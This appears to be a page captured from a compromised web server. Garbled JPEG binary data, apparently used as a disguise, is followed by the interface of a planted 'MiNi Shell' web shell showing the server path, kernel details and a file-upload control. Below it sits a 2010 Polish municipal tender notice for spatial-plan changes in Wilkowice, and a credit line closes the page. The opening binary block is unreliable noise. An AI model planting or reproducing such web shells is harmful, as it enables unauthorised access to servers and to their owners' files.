JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101013/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101013/330360-N-2010.html

<p class="kh_header"><b>Wilkowice: Sporządzenie zmiany miejscowego planu zagospodarowania przestrzennego Gminy Wilkowice w części centralnej i w części wschodniej gminy</b><br>
<b>Numer ogłoszenia: 330360 - 2010; data zamieszczenia: 13.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Wilkowice , ul. Wyzwolenia 25, 43-365 Wilkowice, woj. śląskie, tel. 033 4990077 w. 307, faks 033 4990077 w. 420.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wilkowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sporządzenie zmiany miejscowego planu zagospodarowania przestrzennego Gminy Wilkowice w części centralnej i w części wschodniej gminy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie usługi planowania przestrzennego polegającej na opracowaniu projektów: 
Zadanie nr 1 - Sporządzenie zmiany miejscowego planu zagospodarowania przestrzennego Gminy Wilkowice w części centralnej.                       
(Uchwała Nr XXXIX/408/2010 rady Gminy Wilkowice z dnia 25 lutego 2010r.) 
Zadanie nr 2 - Sporządzenie zmiany miejscowego planu zagospodarowania przestrzennego Gminy Wilkowice we wschodniej części gminy (obejmujący obszar od ul. Prostej i Wyzwolenia w kierunku ul. Żywieckiej i torów kolejowych PKP do granic gminy).       
(Uchwała Nr XXII/208/2008 Rady Gminy Wilkowice z dnia 28.08.2008r.)                   
Zadanie nr 3 - Sporządzenie zmiany fragmentu miejscowego planu zagospodarowania przestrzennego Gminy Wilkowice we wschodniej części gminy:  a) obręb Huciska, obejmujący parcele o nr p.gr. 34/3, 34/4, 34/5, 34/6, 21, 20, 25/3, 34/1;  b)obręb Wilkowice obejmujący parcele o nr p.gr. 2031, 2032 - rejon ul.  Strażackiej i ul. Wyzwolenia 
(Uchwała Nr XXXIX/409/2010 Rady Gminy Wilkowice z dnia 25 lutego 2010r.)
Przedmiot zamówienia należy sporządzić według zakresu określonego w uchwałach:
a) Uchwała Nr XXXVIII/396/2010 Rady Gminy Wilkowice z dnia 14 stycznia 2010r. w sprawie uchwalenia Studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Wilkowice. b) Uchwała Nr XXII/208/2008 Rady Gminy Wilkowice z dnia 28.08.2008r. w sprawie przystąpienia do zmiany miejscowego planu zagospodarowania przestrzennego Gminy Wilkowice we wschodniej części gminy (obejmujący obszar od ul. Prostej i Wyzwolenia w kierunku ul. Żywieckiej i torów kolejowych do granic gminy).   c) Uchwała Nr XXXIX/408/2010 Rady Gminy Wilkowice z dnia 25 lutego 2010r. w sprawie: przystąpienia do zamiany miejscowego planu zagospodarowania przestrzennego Gminy Wilkowice w centralnej części gminy. d) Uchwała Nr XXXIX/409/2010 Rady Gminy Wilkowice z dnia 25 lutego 2010r. w sprawie: przystąpienia do zmiany fragmentu miejscowego planu zagospodarowania przestrzennego Gminy Wilkowice we wschodniej części gminy.Przedmiot zamówienia obejmuje realizację następujących części w ramach realizacji poszczególnych zadań, o których mowa w pkt 3.1. SIWZ: Część I.  Analiza danych wyjściowych: a/ skompletowanie i analiza materiałów wyjściowych dostarczonych przez Zamawiającego oraz wymaganych przepisami prawa; b/	ocena istniejącego stanu zagospodarowania przestrzennego w tym inwentaryzacja urbanistyczna; c/przygotowanie obwieszczeń i ogłoszeń o podjęciu uchwały o przystąpieniu do sporządzania planu, wskazując miejsce i termin składania wniosków do planu; d/zawiadomienie instytucji, organów właściwych do opiniowania i uzgadniania o przystąpieniu do sporządzania planu; e/	rozpatrzenie wniesionych wniosków do projektu planu i zgodności z ustaleniami studium; f/przedstawieni wyników analizy Zamawiającemu; g / wystawienie faktury częściowej w wysokości 20% wartości zamówienia. Część II - projektowanie:    
a/ sprawdzenie i ewentualnie sporządzenie aktualizacji opracowania ekofizjograficznego, uwzględniającego wymagania zawarte w rozporządzeniu Ministra Środowiska z dnia 9 września 2002r. w sprawie opracowań ekofizjograficznych /Dz. U. Nr 155, poz.1298 /, w 2 egz. (w formie opisowej, graficznej - 1egz. w formie elektronicznej); b/ opracowanie koncepcji planu zagospodarowania w skali 1:2000 na bazie ewidencyjnej mapy numerycznej sporządzonej w programie EWMAPA formy GEOBID z Katowic (z uwzględnieniem mapy zasadniczej), biorąc pod uwagę wyniki z dokonanej analizy i uwagi m.in. Zamawiającego; c/ opracowanie prognozy oddziaływania na środowisko uwzględniającej wymagania zawarte w przepisach ustawy  Prawo ochrony środowiska  - w 2 egz. (w formie opisowej i elektronicznej); d/ opracowanie skutków finansowych uchwalenia planu uwzględniające wymagania rozporządzenia Ministra Infrastruktury z dnia 26 sierpnia 2003 r.  w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. Nr  164, poz. 1587) oraz przepisów o gospodarce nieruchomościami w odniesieniu do zasad i do osób uprawnionych do określania tych skutków; e/opracowanie wniosków o zmianę przeznaczenia gruntów rolnych i leśnych na cele nie rolne i nieleśne;
f/ przekazanie materiałów określonych w pkt a/ , b/, c/d/, e/  Zamawiającemu. Część III - opiniowanie i uzgadnianie: a/uzyskanie opinii o projekcie  planu komisji  urbanistyczno - architektonicznej, b/	wprowadzenie do projektu planu, uwzględnionych przez Zamawiającego, korekt wynikających z uzyskanej opinii komisji, c/uzyskanie opinii o projekcie planu od właściwych organów, wymaganych ustawą o planowaniu i zagospodarowaniu przestrzennym i innymi  przepisami szczególnymi, d/uzgodnienie projektu planu z właściwymi organami wymaganymi ustawą i innymi przepisami szczególnymi, e/uzyskanie zgód na zmianę przeznaczenia gruntów rolnych i leśnych na cele nierolnicze i nieleśne w trybie przepisów ustawy o ochronie gruntów rolnych i leśnych, f/ wprowadzenie do projektu planu korekt wynikających z uzyskanych opinii, zgód i dokonanych uzgodnień organów określonych  w pkt 3 lit. a), b), c), d), e); 
g/przekazanie uzgodnionego projektu planu w 1 egz.(w formie opisowej, graficznej w skali 1  2000)  oraz w 1 egz. w formie elektronicznej,  Zamawiającemu.
Część IV- wyłożenie i dyskusja publiczna: a.	przygotowanie ogłoszeń i obwieszczeń, udział w wyłożeniu do publicznego wglądu projektu planu wraz z prognozą oddziaływania na środowisko oraz prezentacja w/w opracowań w ramach dyskusji publicznej; b.	wyłożenie projektu planu do publicznego wglądu wraz z prognozą oddziaływania na środowisko; c.	opracowanie analizy uwag wniesionych do projektu planu wraz z propozycją ich rozpatrzenia oraz uzasadnieniem nieuwzględnienia pozostałych oraz uzyskanie akceptacji Zamawiającego; d.	wprowadzenie do projektu planu korekt wynikających z rozpatrzenia uwag przez Wójta, o których mowa w pkt 4 lit. c); e.	wystawienie faktury częściowej w wysokości 30% wartości zamówienia; f.	udział w dyskusji publicznej.
Część V - uchwalenie i czynności po uchwaleniu planu: a.	przedstawienie Radzie Gminy projektu planu wraz z listą nieuwzględnionych uwag oraz z uzasadnieniami planu i rozstrzygnięć dotyczących skarg; b.	przygotowanie projektu rozstrzygnięcia o sposobie realizacji zapisanych w planie inwestycji z zakresu infrastruktury technicznej, które nalezą do zadań własnych gminy oraz zasadach ich finansowania zgodnie z przepisami ustawy o finansach publicznych;
c.	ewentualne wprowadzenie zmian do projektu planu wynikających z uwzględnienia uwag i udział w czynnościach  ponowionej (w niezbędnym zakresie) procedury  planistycznej; d.	ewentualne ponowienie uzgodnień w niezbędnym zakresie; e.	ewentualne wprowadzenie do projektu planu korekt wynikających z ponownych uzgodnień; f.	przygotowanie dokumentacji prac planistycznych do ich oceny pod względem zgodności  z przepisami prawnymi przez Wojewodę; g.	udział w czynnościach niezbędnych do ewentualnego doprowadzenia planu do zgodności z przepisami prawnymi, w sytuacji stwierdzenia nieważności uchwały  w  sprawie planu; h.	wystawienie faktury częściowej w wysokości 30% wartości zamówienia
Część VI - Prace końcowe. Wykonawca dostarczy Zamawiającemu:
a.	6 egz. planu zagospodarowania (tekst i rysunki) w skali 1:2000 na bazie ewidencyjnej mapy numerycznej, w przypadku wprowadzenie mapy zasadniczej przez Starostwo Powiatowe Wydział Geodezji w Bielsku-Białej, również na mapie zasadniczej - w tym 2 ezg. zalaminowane; b.	2 egzemplarze w formie elektronicznej - w formie warstw dla programu EWMAPA firmy GEOBID wraz z możliwością współpracy z programem WINPLAN firmy GEOBID; c.	1 egzemplarz w formie umożliwiającej publikacje na stronie internetowej; d.	2 egzemplarze dokumentacji formalno-prawnej (oryginał + kopia); e.	3 egz. podsumowania strategicznej oceny oddziaływania na środowisko; f.	wystawienie faktury (częściowej) końcowej po ogłoszeniu uchwały Rady Gminy w sprawie uchwalenia planu w Dzienniku Urzędowym Województwa Śląskiego w wysokości 20% wartości zamówienia
Wykonawca jest zobowiązany do wykonania wszelkich czynności formalno-prawnych wynikających z art. 11, 17 ustawy z dnia 27.03.2003r. o planowaniu i zagospodarowaniu przestrzennych do których z mocy prawa jest zobowiązany Wójt (nie obejmuje wysyłania korespondencji). Wykonawca jest zobowiązany do zapoznania się z terenem objętym zakresem opracowania we własnym zakresie. Wszystkie koszty z tym związane ponosi Wykonawca. Szczegółowe warunki realizacji przedmiotu zamówienia zawiera Załącznik nr 1 do SIWZ - Wzór umowy.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 16.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie publiczne mogą ubiegać się Wykonawcy, którzy wykonali tj. zakończyli w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie należycie opracował co najmniej jeden plan zagospodarowania przestrzennego gminy dla obszaru nie mniejszego niż 25 km2 który został pozytywnie zaopiniowany przez Wojewodę, a następnie opublikowany w Dzienniku Urzędowym</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie publiczne mogą ubiegać się Wykonawcy, którzy dysponują osobami zdolnymi do wykonania zamówienia, które będą uczestniczyć w wykonywaniu zamówienia: tj.: -  1 osobą, która będzie pełnić funkcję głównego projektanta zespołu przygotowującego projekt zmian miejscowego planu zagospodarowania przestrzennego, posiadająca uprawnienia urbanistyczne określone przepisami ustawy z dnia 15.12.2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. Nr 5 z 2001 r., z późn. zmianami); - 1 osobą, która będzie członkiem zespołu przygotowującego projekt zmian miejscowego planu zagospodarowania przestrzennego, posiadająca uprawnienia urbanistyczne określone przepisami ustawy z dnia 15.12.2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. Nr 5 z 2001 r., z późn. zmianami);  - 1 osobą, która  będzie członkiem zespołu przygotowującego projekt zmian miejscowego planu zagospodarowania przestrzennego, posiadająca uprawnienia architektoniczne określone przepisami ustawy z dnia 15.12.2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. Nr 5 z 2001 r., z późn. zmianami), posiadającymi aktualne ubezpieczenie od odpowiedzialności cywilnej w ramach przynależności do właściwej izby urbanistów lub architektów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) wypełniony Druk Oferta, stanowiący załącznik nr 6 do niniejszej specyfikacji, b) aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej jeżeli wykonawca posiada taki wpis,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość dokonania zmiany umowy w przypadku, gdy nastąpi zamiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy / np. VAT, przepisy branżowe/; 2. Terminy realizacji poszczególnych części zamówienia w ramach realizacji zadań stanowiących przedmiot umowy określone w harmonogramie realizacji przedmiotu umowy mogą ulec zmianie w następujących przypadkach gdy:a) Zamawiający opóźni dostarczenie bądź rozszerzy dane, na podstawie których wykonywana jest dokumentacja, b) warunki projektowania zostaną zmienione przez jednostki opiniujące, uzgadniające albo przez zmianę przepisów i normatywów, c) jednostki uzgadniające, zatwierdzające lub publikujące przedłużą termin swoich czynności ponad przewidziane prawem terminy lub wykażą się bezczynnością, d) zajdzie potrzeba ponowienia uzgodnień i opinii wynikających z uwzględnionych uwag przez Wójta, e) Rada Gminy stwierdzi konieczność dokonania zmian w przedstawionym do uchwalenia  projekcie planu, f) nastąpi zmiana przepisów prawnych dotyczących planowania i zagospodarowania przestrzennego. W sytuacji wystąpienia któregokolwiek z  w/w przypadków strony ustalą nowe terminy realizacji poszczególnych części w ramach realizacji zadań stanowiących przedmiot umowy, z tym że maksymalny okres przesunięcia terminu zakończenia realizacji przedmiotu umowy równy będzie okresowi przerwy, postoju lub okresowi ponownej realizacji danej części w ramach realizacji zadań stanowiących przedmiot umowy zgodnej z okresem wynikającym z harmonogramu realizacji przedmiotu umowy; 3. Wykonawca może podpisać umowę o wykonanie części przedmiotu umowy z podwykonawcami nie wymienionymi w swojej ofercie pod warunkiem uprzedniego uzyskania pisemnej zgody Zamawiającego. Powyższe wymaga sporządzenia aneksu do niniejszej umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.ugwilkowice.rekord.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Wilkowice ul. Wyzwolenia 25 ; 43-365 Wilkowice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.10.2010 godzina 13:00, miejsce: Urząd Gminy Wilkowice / Biuro Obsługi Klienta (parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com